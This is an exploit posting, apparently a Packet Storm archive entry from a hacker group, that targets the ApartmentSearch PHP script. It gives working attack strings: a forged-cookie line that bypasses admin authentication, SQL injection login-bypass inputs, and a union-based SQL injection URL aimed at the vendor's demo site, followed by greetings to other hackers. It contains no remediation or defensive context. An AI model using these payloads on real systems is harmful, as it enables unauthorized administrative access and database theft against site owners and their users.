ApartmentSearch Insecure Cookie Handling / SQL Injection

2010-02-10T00:00:00
ID PACKETSTORM:86123
Type packetstorm
Reporter jiko
Modified 2010-02-10T00:00:00

Description

                                        
|=-----------------------------------------------------=|  
|=-------------=[ JIKO |No-exploit.Com| ]=-----------=|  
|=-----------------------------------------------------=|  
[~]-----------|00|  
Name :JIKO (JAWAD)  
Home :No-exploit.Com  
Mail : !x!  
[~]-----------|01|  
-{Script}  
name :ApartmentSearch  
link :http://www.ezonescripts.com/productdemos/ApartmentSearch/Site_Admin/admin.php  
  
[~]-----------|02|  
-{3xpl01t}  
javascript:document.cookie="SiteAdminPass=1; path=/productdemos/ApartmentSearch/Site_Admin/";  
User:' or ' 1=1--  
pass:' or ' 1=1--  
http://www.ezonescripts.com/productdemos/ApartmentSearch/listtest.php?r=-1%20union%20select%200,user()--  
[~]-----------|03|  
-{Greetz}  
Cyber-Zone,HxH,Hussin X,sniper code,Stack,HiSoKa,The SadHacker  
|No-Exploit.com Members  
---------------------------------------------------------  